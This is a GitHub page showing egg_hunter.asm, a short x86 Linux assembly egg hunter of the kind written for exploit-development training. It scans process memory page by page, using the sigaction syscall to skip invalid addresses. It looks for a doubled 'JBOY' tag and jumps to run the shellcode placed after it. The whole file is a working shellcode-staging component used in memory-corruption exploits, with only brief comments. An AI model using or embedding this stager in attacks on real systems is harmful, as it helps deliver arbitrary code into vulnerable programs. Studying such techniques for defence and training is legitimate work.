-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathegg_hunter.asm
More file actions
27 lines (22 loc) · 957 Bytes
/
egg_hunter.asm
File metadata and controls
27 lines (22 loc) · 957 Bytes
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
global _start
section .text
_start:
xor ecx, ecx ;zero out ecx
page_allign:
xor cx, 0x0fff ;Page allignment
valid_add:
inc ecx ;increment the pointer to try next valid address
push 0x43 ;push syscall 67 | sigaction
pop eax ;EAX=0x43
int 0x80 ;call sigaction() for validation
efault_cmpsn:
cmp al, 0xf2 ;Low-byte of EAX compared against 0xf2|EFAULT
jz page_allign ;If ZF set JMP back to "page_allign"
search_tag:
mov eax, 0x4a424f59 ;move the "tag" to EAX register| 0x4a424f59 = JBOY
mov edi, ecx ;move ECX to EDI
scasd ;Compare contents of EDI to the dword value in EAX and increment
jnz valid_add ;Not equal? then go back to valid_add
scasd ;Compare contents of EDI to the dword value in EAX and increment
jnz valid_add ;Not equal? then go back to valid_add
jmp edi ;TAG found ==> Execute the shellcode I'm pointing to